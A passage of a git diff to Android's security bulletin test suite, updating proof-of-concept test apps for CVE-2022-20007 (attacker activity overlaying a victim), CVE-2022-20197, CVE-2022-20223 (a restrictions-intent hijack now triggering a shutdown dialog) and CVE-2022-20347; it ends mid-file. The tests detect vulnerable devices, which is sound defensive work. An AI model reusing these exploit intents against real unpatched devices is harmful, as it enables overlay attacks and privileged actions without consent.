- if (sharedPreferences.getInt(key,
- getIntegerRes(R.integer.assumptionFailure)) == getIntegerRes(
- R.integer.pass)) {
- preferenceChanged.release();
+ assumeNotNull(mContext);
+ launchMainActivity(getIntegerRes(R.integer.twoActivities));
+ mSharedPrefs = mContext.getSharedPreferences(getStringRes(R.string.sharedPreferences),
+ Context.MODE_APPEND);
+ assumeNotNull(mSharedPrefs);
+ final Semaphore preferenceChanged = new Semaphore(0);
+ final Semaphore preferenceChanged2 = new Semaphore(0);
+ OnSharedPreferenceChangeListener listener = new OnSharedPreferenceChangeListener() {
+ @Override
+ public void onSharedPreferenceChanged(SharedPreferences sharedPreferences,
+ String key) {
+ if (key.equals(getStringRes(R.string.resultKey))) {
+ if (sharedPreferences.getInt(key,
+ getIntegerRes(R.integer.assumptionFailure)) == getIntegerRes(
+ R.integer.pass)) {
+ preferenceChanged.release();
+ mIsVulnerable = false;
+ }
+ } else if (key.equals(getStringRes(R.string.resultKey2))) {
+ if (sharedPreferences.getInt(key,
+ getIntegerRes(R.integer.assumptionFailure)) == getIntegerRes(
+ R.integer.pass)) {
+ preferenceChanged2.release();
+ mIsVulnerable2 = false;
+ }
}
}
- }
- };
- sharedPrefs.registerOnSharedPreferenceChangeListener(listener);
- try {
+ };
+ mSharedPrefs.registerOnSharedPreferenceChangeListener(listener);
preferenceChanged.tryAcquire(timeoutSec, TimeUnit.SECONDS);
- } catch (InterruptedException e) {
+
+ // Check if attacker activity is able to overlay victim activity
+ mFirstPocActivityBounds = getBounds(FirstPocActivity.class.getName());
+ String attackerActivityName = getStringRes(R.string.attackerPkg) + "/."
+ + getStringRes(R.string.attackerActivity);
+ mPocAttackerActivityBounds = getBounds(attackerActivityName);
+ Log.e("DeviceTest", "mFirstPocActivityBounds=" + mFirstPocActivityBounds);
+ Log.e("DeviceTest", "mPocAttackerActivityBounds=" + mPocAttackerActivityBounds);
+ boolean isValidConfiguration =
+ mFirstPocActivityBounds.equals(mPocAttackerActivityBounds);
+ if (isValidConfiguration) {
+ checkResult(getStringRes(R.string.resultKey));
+ } else {
+ // Device might have 2 task display areas. Detect vulnerability in this case.
+ mDevice.pressHome();
+ assumeTrue(mDevice.wait(Until.gone(By.pkg(mContext.getPackageName())), timeoutSec));
+ mIsVulnerable = true;
+ mIsVulnerable2 = true;
+ launchMainActivity(getIntegerRes(R.integer.threeActivities));
+ preferenceChanged.tryAcquire(getIntegerRes(R.integer.permitCount), timeoutSec,
+ TimeUnit.SECONDS);
+ preferenceChanged2.tryAcquire(timeoutSec, TimeUnit.SECONDS);
+
+ // check if attacker activity is able to overlay any of the victim activities
+ mFirstPocActivityBounds = getBounds(FirstPocActivity.class.getName());
+ String secondActivityName = getStringRes(R.string.secondPocAppPkg) + "/."
+ + getStringRes(R.string.secondActivity);
+ mSecondPocActivityBounds = getBounds(secondActivityName);
+ mPocAttackerActivityBounds = getBounds(attackerActivityName);
+ Log.e("DeviceTest", "mFirstPocActivityBounds=" + mFirstPocActivityBounds);
+ Log.e("DeviceTest", "mSecondPocActivityBounds=" + mSecondPocActivityBounds);
+ Log.e("DeviceTest", "mPocAttackerActivityBounds=" + mPocAttackerActivityBounds);
+ isValidConfiguration = mFirstPocActivityBounds.equals(mPocAttackerActivityBounds);
+ boolean isValidConfiguration2 =
+ mSecondPocActivityBounds.equals(mPocAttackerActivityBounds);
+ assumeTrue(
+ getStringRes(R.string.boundsNotEqualMessage) + mFirstPocActivityBounds + " "
+ + mSecondPocActivityBounds + " " + mPocAttackerActivityBounds,
+ isValidConfiguration || isValidConfiguration2);
+
+ if (isValidConfiguration) {
+ checkResult(getStringRes(R.string.resultKey));
+ } else {
+ checkResult(getStringRes(R.string.resultKey2));
+ }
+ }
+ } catch (Exception e) {
assumeNoException(e);
}
- int result = sharedPrefs.getInt(getStringRes(R.string.resultKey),
- getIntegerRes(R.integer.assumptionFailure));
- String message = sharedPrefs.getString(getStringRes(R.string.messageKey),
- getStringRes(R.string.assumptionFailureMessage));
- assumeTrue(message, result != getIntegerRes(R.integer.assumptionFailure));
- assertNotEquals(message, result, getIntegerRes(R.integer.fail));
}
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/FirstPocActivity.java
index 038335e8711..c89986b9eaf 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/FirstPocActivity.java
@@ -21,29 +21,35 @@ import android.content.Context;
import android.content.SharedPreferences;
import android.os.Bundle;
-public class PocActivity extends Activity {
+public class FirstPocActivity extends Activity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
- setSharedPreferenes(getResources().getInteger(R.integer.fail),
- getString(R.string.failMessage));
+ }
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+ setSharedPreferenes(getResources().getInteger(R.integer.fail));
}
@Override
protected void onPause() {
super.onPause();
- setSharedPreferenes(getResources().getInteger(R.integer.pass),
- getString(R.string.passMessage));
+ setSharedPreferenes(getResources().getInteger(R.integer.pass));
}
- void setSharedPreferenes(int result, String message) {
- SharedPreferences sh =
- getSharedPreferences(getString(R.string.sharedPreferences), Context.MODE_PRIVATE);
- SharedPreferences.Editor edit = sh.edit();
- edit.putInt(getString(R.string.resultKey), result);
- edit.putString(getString(R.string.messageKey), message);
- edit.commit();
+ void setSharedPreferenes(int result) {
+ try {
+ SharedPreferences sh = getSharedPreferences(getString(R.string.sharedPreferences),
+ Context.MODE_PRIVATE);
+ SharedPreferences.Editor edit = sh.edit();
+ edit.putInt(getString(R.string.resultKey), result);
+ edit.commit();
+ } catch (Exception e) {
+ // ignore exception here
+ }
}
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/PocMainActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/PocMainActivity.java
index 7a4e841f6fd..94de7f09a60 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/PocMainActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/PocMainActivity.java
@@ -17,7 +17,6 @@
package android.security.cts.CVE_2022_20007;
import android.app.Activity;
-import android.content.ActivityNotFoundException;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
@@ -30,30 +29,48 @@ public class PocMainActivity extends Activity {
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
- launchAttack();
- }
-
- public void launchAttack() {
- String testPkgName = getPackageName();
- final Intent coverIntent = new Intent();
- coverIntent.setComponent(new ComponentName("android.security.cts.CVE_2022_20007_attacker",
- "android.security.cts.CVE_2022_20007_attacker.PocActivity"));
- coverIntent.setFlags(Intent.FLAG_ACTIVITY_NO_ANIMATION |
- Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_MULTIPLE_TASK);
- final Intent victimIntent = new Intent(PocMainActivity.this, PocActivity.class);
- victimIntent.setFlags(Intent.FLAG_ACTIVITY_NO_ANIMATION);
- Intent[] intents = {victimIntent, coverIntent};
try {
- startActivities(intents);
- } catch (ActivityNotFoundException e) {
- SharedPreferences sh = getSharedPreferences(getString(R.string.sharedPreferences),
- Context.MODE_PRIVATE);
- SharedPreferences.Editor edit = sh.edit();
- edit.putInt(getString(R.string.resultKey),
- getResources().getInteger(R.integer.assumptionFailure));
- edit.putString(getString(R.string.messageKey),
- getString(R.string.assumptionFailureMessage));
- edit.commit();
+ String testPkgName = getPackageName();
+ final Intent coverIntent = new Intent();
+ coverIntent.setComponent(new ComponentName(getString(R.string.attackerPkg),
+ getString(R.string.attackerPkg) + "." + getString(R.string.attackerActivity)));
+ coverIntent.setFlags(Intent.FLAG_ACTIVITY_NO_ANIMATION | Intent.FLAG_ACTIVITY_NEW_TASK
+ | Intent.FLAG_ACTIVITY_MULTIPLE_TASK | Intent.FLAG_ACTIVITY_NO_HISTORY);
+ final Intent victimIntent = new Intent(PocMainActivity.this, FirstPocActivity.class);
+ victimIntent
+ .setFlags(Intent.FLAG_ACTIVITY_NO_ANIMATION | Intent.FLAG_ACTIVITY_NO_HISTORY);
+ int numActivities = getIntent().getIntExtra(getString(R.string.numActivities),
+ /* default */ getResources().getInteger(R.integer.twoActivities));
+ if (numActivities == getResources().getInteger(R.integer.twoActivities)) {
+ Intent[] intents = {victimIntent, coverIntent};
+ startActivities(intents);
+ } else {
+ final Intent secondVictimIntent = new Intent();
+ secondVictimIntent.setComponent(new ComponentName(
+ getString(R.string.secondPocAppPkg), getString(R.string.secondPocAppPkg)
+ + "." + getString(R.string.secondActivity)));
+ secondVictimIntent.setFlags(
+ Intent.FLAG_ACTIVITY_NO_ANIMATION | Intent.FLAG_ACTIVITY_NO_HISTORY);
+ startActivity(victimIntent);
+
+ // wait to prevent both the victim activities from getting launched on same display
+ Thread.sleep(5000);
+ Intent[] intents2 = {secondVictimIntent, coverIntent};
+ startActivities(intents2);
+ }
+ } catch (Exception e) {
+ try {
+ SharedPreferences sh = getSharedPreferences(getString(R.string.sharedPreferences),
+ Context.MODE_PRIVATE);
+ SharedPreferences.Editor edit = sh.edit();
+ edit.putInt(getString(R.string.resultKey),
+ getResources().getInteger(R.integer.assumptionFailure));
+ edit.putString(getString(R.string.messageKey),
+ getString(R.string.assumptionFailureMessage));
+ edit.commit();
+ } catch (Exception ex) {
+ // ignore exception here
+ }
}
}
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20197/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2022-20197/Android.bp
new file mode 100644
index 00000000000..582076e2d23
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20197/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2022-20197",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.rules",
+ "androidx.test.core",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20197/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20197/AndroidManifest.xml
new file mode 100644
index 00000000000..3ea2a62f7bc
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20197/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ xmlns:tools="http://schemas.android.com/tools"
+ package="android.security.cts.CVE_2022_20197">
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2022_20197" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20197/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20197/res/values/strings.xml
new file mode 100644
index 00000000000..c9a9407b3da
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20197/res/values/strings.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="vulnerableMsg">Device is vulnerable to b/208279300!</string>
+ <string name="stringObj">CVE_2022_20197</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20197/src/android/security/cts/CVE_2022_20197/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20197/src/android/security/cts/CVE_2022_20197/DeviceTest.java
new file mode 100644
index 00000000000..a7b56187d47
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20197/src/android/security/cts/CVE_2022_20197/DeviceTest.java
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20197;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static org.junit.Assert.assertNull;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.PendingIntent;
+import android.content.res.Resources;
+import android.os.Parcel;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testParcel() {
+ try {
+ Resources resources = getApplicationContext().getResources();
+ Parcel parcel = Parcel.obtain();
+ Object cookie = (Object) resources.getString(R.string.stringObj);
+ parcel.setClassCookie(PendingIntent.class, cookie);
+ parcel.recycle();
+ Object value = parcel.getClassCookie(PendingIntent.class);
+ assertNull(resources.getString(R.string.vulnerableMsg), value);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20223/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20223/res/values/strings.xml
index 6257834e8fa..4a250ceda12 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20223/res/values/strings.xml
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20223/res/values/strings.xml
@@ -15,16 +15,18 @@
limitations under the License.
-->
<resources>
- <string name="appSettingsIconResId">com.android.settings:id/app_restrictions_settings</string>
+ <string name="allowAppsTextResId">restricted_profile_configure_apps_title</string>
+ <string name="appSettingsIconResId">%1$s:id/app_restrictions_settings</string>
+ <string name="customizeRestrictionsTextResId">restricted_profile_customize_restrictions</string>
<string name="messageKey">message</string>
<string name="resType">string</string>
<string name="sharedPreferences">SharedPreferences</string>
+ <string name="shutdownMsgResId">shutdown_confirm</string>
<string name="testFailMsg">
Vulnerable to b/223578534!! LaunchAnyWhere in AppRestrictionsFragment due to unsafe package
check
</string>
<string name="textResId">user_restrictions_title</string>
<string name="timedOutMsg">Timed out waiting for text/res %1$s on display</string>
- <string name="uriData">tel:555-TEST</string>
<string name="userName">CVE_2022_20223_RestrictedUser</string>
</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20223/src/android/security/cts/CVE_2022_20223/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20223/src/android/security/cts/CVE_2022_20223/DeviceTest.java
index e47e593f31a..92b1df205bf 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20223/src/android/security/cts/CVE_2022_20223/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20223/src/android/security/cts/CVE_2022_20223/DeviceTest.java
@@ -24,10 +24,10 @@ import static org.junit.Assume.assumeTrue;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
+import android.content.pm.PackageManager;
import android.content.res.Resources;
import android.os.Bundle;
import android.provider.Settings;
-import android.telecom.TelecomManager;
import androidx.test.runner.AndroidJUnit4;
import androidx.test.uiautomator.By;
@@ -43,10 +43,11 @@ public class DeviceTest {
private static final int TIMEOUT_MS = 20000;
private UiDevice mDevice;
private Context mContext;
+ private PackageManager mPackageManager;
- private String getDefaultDialerPackage() {
- TelecomManager telecomManager = mContext.getSystemService(TelecomManager.class);
- return telecomManager.getSystemDialerPackage();
+ boolean isTV() {
+ return mPackageManager.hasSystemFeature(PackageManager.FEATURE_TELEVISION)
+ || mPackageManager.hasSystemFeature(PackageManager.FEATURE_LEANBACK);
}
// Wait for UiObject to appear and click on the UiObject if it is visible
@@ -63,47 +64,77 @@ public class DeviceTest {
try {
mDevice = UiDevice.getInstance(getInstrumentation());
mContext = getInstrumentation().getContext();
+ mPackageManager = mContext.getPackageManager();
+ if (isTV()) {
+ Intent intent = new Intent(Settings.ACTION_SECURITY_SETTINGS);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ mContext.startActivity(intent);
- Intent intent = new Intent(Settings.ACTION_USER_SETTINGS);
- intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
- mContext.startActivity(intent);
+ // Click on text "Allowed apps"
+ String settingsPackageName =
+ intent.resolveActivity(mPackageManager).getPackageName();
+ Resources res = mPackageManager.getResourcesForApplication(settingsPackageName);
+ String text = res.getString(
+ res.getIdentifier(mContext.getString(R.string.allowAppsTextResId),
+ mContext.getString(R.string.resType), settingsPackageName));
+ BySelector selector = By.text(text);
+ assumeTrue(mContext.getString(R.string.timedOutMsg, text), clickUiObject(selector));
- BySelector selector = By.text(mContext.getString(R.string.userName));
- assumeTrue(
- mContext.getString(R.string.timedOutMsg, mContext.getString(R.string.userName)),
- clickUiObject(selector));
+ // Click on text "Customize restrictions"
+ text = res.getString(res.getIdentifier(
+ mContext.getString(R.string.customizeRestrictionsTextResId),
+ mContext.getString(R.string.resType), settingsPackageName));
+ selector = By.text(text);
+ assumeTrue(mContext.getString(R.string.timedOutMsg, text), clickUiObject(selector));
+ } else {
+ Intent intent = new Intent(Settings.ACTION_USER_SETTINGS);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ mContext.startActivity(intent);
- String settingsPackageName =
- intent.resolveActivity(mContext.getPackageManager()).getPackageName();
- Context settingsContext = mContext.createPackageContext(settingsPackageName,
- Context.CONTEXT_IGNORE_SECURITY);
- Resources res = settingsContext.getPackageManager()
- .getResourcesForApplication(settingsPackageName);
- String text = settingsContext
- .getString(res.getIdentifier(mContext.getString(R.string.textResId),
- mContext.getString(R.string.resType), settingsPackageName));
- selector = By.text(text);
- assumeTrue(mContext.getString(R.string.timedOutMsg, text), clickUiObject(selector));
+ // Click on text "CVE_2022_20223_RestrictedUser"
+ BySelector selector = By.text(mContext.getString(R.string.userName));
+ assumeTrue(mContext.getString(R.string.timedOutMsg,
+ mContext.getString(R.string.userName)), clickUiObject(selector));
- selector = By.res(mContext.getString(R.string.appSettingsIconResId));
- assumeTrue(
- mContext.getString(R.string.timedOutMsg,
- mContext.getString(R.string.appSettingsIconResId)),
- clickUiObject(selector));
+ // Click on text "App & content access"
+ String settingsPackageName =
+ intent.resolveActivity(mPackageManager).getPackageName();
+ Resources res = mPackageManager.getResourcesForApplication(settingsPackageName);
+ String text =
+ res.getString(res.getIdentifier(mContext.getString(R.string.textResId),
+ mContext.getString(R.string.resType), settingsPackageName));
+ selector = By.text(text);
+ assumeTrue(mContext.getString(R.string.timedOutMsg, text), clickUiObject(selector));
+ // Click on icon with resource-id "<settingsPackage>:id/app_restrictions_settings"
+ selector = By.res(
+ mContext.getString(R.string.appSettingsIconResId, settingsPackageName));
+ assumeTrue(
+ mContext.getString(R.string.timedOutMsg, mContext
+ .getString(R.string.appSettingsIconResId, settingsPackageName)),
+ clickUiObject(selector));
+ }
+ // Check if ShutDown activity is launched indicating presence of vulnerability
+ String androidPackageName =
+ PocBroadcastReceiver.getShutdownDefaultComponent(mContext).getPackageName();
+ Resources res = mPackageManager.getResourcesForApplication(androidPackageName);
+ String text =
+ res.getString(res.getIdentifier(mContext.getString(R.string.shutdownMsgResId),
+ mContext.getString(R.string.resType), androidPackageName));
assertFalse(mContext.getString(R.string.testFailMsg),
- mDevice.wait(Until.hasObject(By.pkg(getDefaultDialerPackage())), TIMEOUT_MS));
+ mDevice.wait(Until.hasObject(By.text(text)), TIMEOUT_MS));
} catch (Exception e) {
assumeNoException(e);
} finally {
try {
+ // Check occurrence of any exception in PocBroadcastReceiver
SharedPreferences sharedPrefs = mContext.getSharedPreferences(
mContext.getString(R.string.sharedPreferences), Context.MODE_APPEND);
String assumptionFailure =
sharedPrefs.getString(mContext.getString(R.string.messageKey), null);
assumeTrue(assumptionFailure, assumptionFailure == null);
} catch (Exception e) {
- assumeNoException(e);
+ // Ignore exceptions here
}
}
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20223/src/android/security/cts/CVE_2022_20223/PocBroadcastReceiver.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20223/src/android/security/cts/CVE_2022_20223/PocBroadcastReceiver.java
index c3c7083df18..6df2b9db7fe 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20223/src/android/security/cts/CVE_2022_20223/PocBroadcastReceiver.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20223/src/android/security/cts/CVE_2022_20223/PocBroadcastReceiver.java
@@ -26,9 +26,8 @@ import android.os.Bundle;
public class PocBroadcastReceiver extends BroadcastReceiver {
- ComponentName getPrivilegeCallDefaultComponent(Context context) {
- Intent intent = new Intent(Intent.ACTION_CALL_PRIVILEGED);
- intent.setData(Uri.parse(context.getString(R.string.uriData)));
+ static ComponentName getShutdownDefaultComponent(Context context) {
+ Intent intent = new Intent(Intent.ACTION_REQUEST_SHUTDOWN);
return intent.resolveActivity(context.getPackageManager());
}
@@ -36,14 +35,14 @@ public class PocBroadcastReceiver extends BroadcastReceiver {
public void onReceive(Context context, Intent intent) {
try {
Bundle result = new Bundle();
- Intent dialIntent = new Intent();
- dialIntent.setComponent(getPrivilegeCallDefaultComponent(context));
- dialIntent.setPackage(context.getPackageName());
- dialIntent.setData(Uri.parse(context.getString(R.string.uriData)));
- dialIntent.setAction(Intent.ACTION_CALL_PRIVILEGED);
- result.putParcelable(Intent.EXTRA_RESTRICTIONS_INTENT, dialIntent);
+ Intent shutDownIntent = new Intent();
+ shutDownIntent.setComponent(getShutdownDefaultComponent(context));
+ shutDownIntent.setPackage(context.getPackageName());
+ shutDownIntent.setAction(Intent.ACTION_REQUEST_SHUTDOWN);
+ shutDownIntent.putExtra(Intent.EXTRA_KEY_CONFIRM, true);
+ shutDownIntent.putExtra(Intent.EXTRA_USER_REQUESTED_SHUTDOWN, true);
+ result.putParcelable(Intent.EXTRA_RESTRICTIONS_INTENT, shutDownIntent);
setResultExtras(result);
- return;
} catch (Exception e) {
SharedPreferences sh = context.getSharedPreferences(
context.getString(R.string.sharedPreferences), Context.MODE_PRIVATE);
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20347/src/android/security/cts/CVE_2022_20347/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20347/src/android/security/cts/CVE_2022_20347/DeviceTest.java
index 52f43c5d979..ec61aa1fdf6 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20347/src/android/security/cts/CVE_2022_20347/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20347/src/android/security/cts/CVE_2022_20347/DeviceTest.java
@@ -63,25 +63,20 @@ public class DeviceTest {
return mContext.getResources().getInteger(resId);
}
+ void switchBluetoothMode(String action) {
+ Intent intent = new Intent(mContext, PocActivity.class);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(mContext.getString(R.string.btAction), action);
+ mContext.startActivity(intent);
+ }
+
@Test
public void testBluetoothDiscoverable() {
OnSharedPreferenceChangeListener sharedPrefListener;
SharedPreferences sharedPrefs;
boolean btState = false;
try {
- BluetoothAdapter btAdapter = BluetoothAdapter.getDefaultAdapter();
-
- // Save the state of bluetooth adapter to reset after the test
- btState = btAdapter.isEnabled();
-
- // If bluetooth is disabled, enable it and wait for start activity to complete
mContext = InstrumentationRegistry.getInstrumentation().getContext();
- Intent intent = new Intent(mContext, PocActivity.class);
- intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
- intent.putExtra(mContext.getString(R.string.btAction),
- BluetoothAdapter.ACTION_REQUEST_ENABLE);
- mContext.startActivity(intent);
-
Resources resources = mContext.getResources();
sharedPrefs = mContext.getSharedPreferences(
resources.getString(R.string.sharedPreferences), Context.MODE_APPEND);
@@ -96,6 +91,25 @@ public class DeviceTest {
}
};
sharedPrefs.registerOnSharedPreferenceChangeListener(sharedPrefListener);
+ BluetoothAdapter btAdapter = BluetoothAdapter.getDefaultAdapter();
+
+ // Save the state of bluetooth adapter to reset after the test
+ btState = btAdapter.isEnabled();
+
+ // Disable bluetooth if already enabled in 'SCAN_MODE_CONNECTABLE_DISCOVERABLE' mode
+ if (btAdapter.getScanMode() == btAdapter.SCAN_MODE_CONNECTABLE_DISCOVERABLE) {
+ switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_DISABLE);
+ assumeTrue(mPreferenceChanged.tryAcquire(getInteger(R.integer.timeoutMs),
+ TimeUnit.MILLISECONDS));
+ int result = sharedPrefs.getInt(resources.getString(R.string.resultKey),
+ resources.getInteger(R.integer.assumptionFailure));
+ String message = sharedPrefs.getString(resources.getString(R.string.messageKey),
+ resources.getString(R.string.defaultSemaphoreMsg));
+ assumeTrue(message, result != resources.getInteger(R.integer.assumptionFailure));
+ }
+
+ // Enable bluetooth if in disabled state
+ switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_ENABLE);
assumeTrue(mPreferenceChanged.tryAcquire(getInteger(R.integer.timeoutMs),
TimeUnit.MILLISECONDS));
int result = sharedPrefs.getInt(resources.getString(R.string.resultKey),
@@ -107,6 +121,9 @@ public class DeviceTest {
// Checking if bluetooth is enabled. The test requires bluetooth to be enabled
assumeTrue(btAdapter.isEnabled());
+ // Checking if bluetooth mode is not set to SCAN_MODE_CONNECTABLE_DISCOVERABLE
+ assumeTrue(btAdapter.getScanMode() != btAdapter.SCAN_MODE_CONNECTABLE_DISCOVERABLE);
+
// Launch bluetooth settings which is supposed to set scan mode to
// SCAN_MODE_CONNECTABLE_DISCOVERABLE if vulnerability is present
UiAutomation uiautomation =
@@ -114,7 +131,7 @@ public class DeviceTest {
uiautomation
.adoptShellPermissionIdentity(android.Manifest.permission.MODIFY_PHONE_STATE);
String settingsPkg = getSettingsPkgName();
- intent = new Intent();
+ Intent intent = new Intent();
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
intent.setData(Uri.parse(mContext.getString(R.string.uri)));
intent.setClassName(settingsPkg, settingsPkg + mContext.getString(R.string.className));
@@ -135,11 +152,7 @@ public class DeviceTest {
try {
// Disable bluetooth if it was OFF before the test
if (!btState) {
- Intent intent = new Intent(mContext, PocActivity.class);
- intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
- intent.putExtra(mContext.getString(R.string.btAction),
- BluetoothAdapter.ACTION_REQUEST_DISABLE);
- mContext.startActivity(intent);
+ switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_DISABLE);
assumeTrue(mPreferenceChanged.tryAcquire(getInteger(R.integer.timeoutMs),
TimeUnit.MILLISECONDS));
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/Android.bp
new file mode 100644
index 00000000000..b07e9f27603
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2022-20348",
+ defaults: [
